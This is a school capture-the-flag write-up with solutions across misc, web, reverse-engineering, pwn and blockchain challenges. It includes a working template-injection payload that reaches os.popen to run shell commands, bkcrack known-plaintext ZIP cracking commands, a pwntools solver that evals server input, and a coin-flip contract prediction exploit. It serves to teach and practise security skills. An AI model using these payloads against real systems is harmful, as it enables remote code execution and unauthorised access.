School Competition Writeup
misc
[Easy] superlative render
eigh tfou 4aj1
HTML
<div tal:content="python:getattr(().__class__.__bases__[0].__subclasses__()[159].__init__, '__glob'+'als__')['po'+'pen']('cat /flag').read()">test</div>
<p>${getattr(().__class__.__bases__[0].__subclasses__()[159].__init__, '__glob'+'als__')['po'+'pen']('cat /flag').read()}</p>
flag{mIsUzu_Wl1l_CRoVvn_7HE_pRlma573l1@_lN_H.i.1_wINt3r}
[Medium] Tears of an Era
Python
with open("bin", "rb") as f:
    data = f.read()
# split the file into its even-indexed and odd-indexed bytes and save each stream
with open("even", "wb") as f:
    for i in range(len(data)):
        if i % 2 == 0:
            f.write(bytes([data[i]]))
with open("odd", "wb") as f:
    for i in range(len(data)):
        if i % 2 == 1:
            f.write(bytes([data[i]]))
Text
eigh tfou 4aj1
Shell
bkcrack -C crack.zip -c flag.txtw -x 32 65696768 -x 36 74666f75 -x 480 34616a31
bkcrack 1.8.0 - 2025-08-18
[12:49:19] Attack on 4194304 Z values at index 39
Keys: 4ccfb9d4 4db14f38 2b70df4f
87.7 % (3679382 / 4194304)
Found a solution. Stopping.
You may resume the attack with the option: --continue-attack 3679382
[13:21:46] Keys
4ccfb9d4 4db14f38 2b70df4f
bkcrack -C crack.zip -k 4ccfb9d4 4db14f38 2b70df4f -U unlocked.zip new_password
Python
flag = "4aj1"
key = "ainatas"
encrypted = vigenere_encrypt(flag, key)
print(encrypted)
# ftng{l4eyav0tr@ihq_15_@lzrawy_gu4lntxd_LT}
flag{s4egan0gr@phy_15_@lready_ou4dated_TT}
web
[Easy] tarot_site
When the sun is not in the deck, where will it rise?
Shell
curl -X POST http://ctf.a1natas.com:23747/api/orrery.php \
-H "Content-Type: application/json" \
-d '{"ids":["M-19"],"token":28}'
reverse
[Warm-up] AAAbase
Text
S2m1WSzwzSSHa0KkPhNta1S3bkOSJRW3VTaIahqOPjSDRBGiV049MN==
Base64 applied twice, with a custom alphabet
Text
XYZABCDEFGHIJKLMNOPQRSTUVWxyzabcdefghijklmnopqrstuvw0123456789+/
flag{W31c0m3_70_R3v3r53!!!!}
[Easy] binary
sub_1400015B9
C
if (i % 4 == 0) (s[i] ^ 0x12) == v5[i / 4]
if (i % 4 == 1) s[i] + 5 == v4[i / 4]
if (i % 4 == 2) s[i] + s[i - 1] == v3[i / 4]
if (i % 4 == 3) (i ^ s[i]) == v2[i / 4]
C
v5 = [39, 39, 107, 77]
v4 = [56, 56, 53, 58]
v3 = [102, 102, 165, 104]
v2 = [92, 88, 121, 108]
Inverting the checks position by position gives the inner 16 bytes
533_533_y0ur_53c
flag{533_533_y0ur_53c}
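The position-by-position inversion described above, written out as an added example (not code from the original writeup). The function names check and solve are hypothetical, and the code assumes the comparisons are done on plain integers with no 8-bit wraparound.

```python
# Tables copied from the writeup; which check uses which table follows i % 4.
V5 = [39, 39, 107, 77]     # i % 4 == 0: (s[i] ^ 0x12) == v5[i / 4]
V4 = [56, 56, 53, 58]      # i % 4 == 1: s[i] + 5 == v4[i / 4]
V3 = [102, 102, 165, 104]  # i % 4 == 2: s[i] + s[i - 1] == v3[i / 4]
V2 = [92, 88, 121, 108]    # i % 4 == 3: (i ^ s[i]) == v2[i / 4]


def check(s: bytes) -> bool:
    """Forward check mirroring the four conditions listed for sub_1400015B9."""
    if len(s) != 16:
        return False
    for i, c in enumerate(s):
        group, kind = divmod(i, 4)
        if kind == 0 and (c ^ 0x12) != V5[group]:
            return False
        if kind == 1 and c + 5 != V4[group]:
            return False
        if kind == 2 and c + s[i - 1] != V3[group]:
            return False
        if kind == 3 and (i ^ c) != V2[group]:
            return False
    return True


def solve() -> bytes:
    """Invert each condition in index order; kind 2 needs the previous byte."""
    s = bytearray(16)
    for i in range(16):
        group, kind = divmod(i, 4)
        if kind == 0:
            s[i] = V5[group] ^ 0x12      # XOR is its own inverse
        elif kind == 1:
            s[i] = V4[group] - 5         # undo the +5
        elif kind == 2:
            s[i] = V3[group] - s[i - 1]  # s[i - 1] was recovered one step earlier
        else:
            s[i] = V2[group] ^ i         # the index itself is the XOR key
    return bytes(s)


if __name__ == "__main__":
    inner = solve()
    assert check(inner)                  # the recovered bytes pass the forward check
    print("flag{" + inner.decode() + "}")
```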
[简单] driver
User side:
C
packet[0] = 32;
packet[1] ^= 0x20;
packet[i+1] ^= packet[i];
packet[i+1] = flag[i] ^ flag[i-1]; // XOR difference of adjacent bytes
Then the driver is called:
C
0x222004 // BoxInit
0x222008 // key = "driver_box_key"
0x222010 // encrypt packet
0x222020 // verify
Driver:
C
const unsigned __int8 g_Target[33] =
{ 244u, 210u, 84u, 253u, 226u, 194u, 94u, 97u, 239u, 44u, 1u, 116u, 212u, 222u, 1u, 251u, 188u, 146u, 39u, 167u, 137u, 28u, 132u, 239u, 72u, 229u, 94u, 74u, 249u, 241u, 189u, 35u, 78u
}; // idb
C
buffer[k] ^= g_Sbox[(g_Sbox[i] + old_sbox_i) & 0xff] ^ 0x55;
First recover packet with the same KSA/PRGA, then undo the adjacent XOR:
C
flag[0] = packet[1] ^ 0x20;
for (int i = 1; i < 32; i++) {
    flag[i] = packet[i + 1] ^ flag[i - 1];
}
Python
g_Target = [244,210,84,253,226,194,94,97,239,44,1,116,212,222,1,251,188,146,39,167,137,28,132,239,72,229,94,74,249,241,189,35,78]
key = b"driver_box_key"
# KSA: build the S-box from the key, as the driver does
s = list(range(256))
j = 0
for i in range(256):
    old = s[i]
    j = (j + key[i % len(key)] + old) & 0xFF
    s[i], s[j] = s[j], old
# PRGA: each keystream byte is additionally XORed with 0x55
i = 0
j = 0
packet = []
for c in g_Target:
    i = (i + 1) & 0xFF
    old = s[i]
    j = (j + old) & 0xFF
    s[i], s[j] = s[j], old
    stream = s[(s[i] + old) & 0xFF] ^ 0x55
    packet.append(c ^ stream)
# undo the user-side adjacent XOR to get the 32 flag bytes
flag = bytearray(32)
flag[0] = packet[1] ^ 0x20
for i in range(1, 32):
    flag[i] = packet[i + 1] ^ flag[i - 1]
print(flag)
flag{u53r_15_dr1v3r_n07_dr1v3r!}
pwn
[签到] math-game
Python
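from pwn import *
r = remote("ctf.a1natas.com", 29594)
while True:
    line = r.recvline().decode()
    print(line)
    if line[0] == '[':
        # the expression sits between ']' and '='
        formula = line.split('=')[0].split(']')[1].strip()
        # eval() executes whatever the server sends, so only use it against a trusted challenge host
        answer = eval(formula)
        print(formula, answer)
        r.sendline(str(answer).encode())
r.interactive()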
flag{df0b0046-6a65-4d5c-8eda-c1f59f1cfc64}
blockchain
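[Medium] Simple blockchain
- Install the browser extension
- Create a custom network http://180.184.70.197:8545
- Connect with nc; [1] create an account and note the token
- [2] Notice that funds are needed; get some from the faucet http://180.184.70.197:8080
- [2] Once funded, deploy the contract
- [4] Copy the source code
- Open Remix
- Compile and deploy
- Observe that the contract logic contains uint256 coinFlip = currentBlockValue / FACTOR;. Each time, call getValue() to see whether a flip is needed, then call flip(true); repeat ten times
- Make sure consecutiveWins=10
- [3] Get the flag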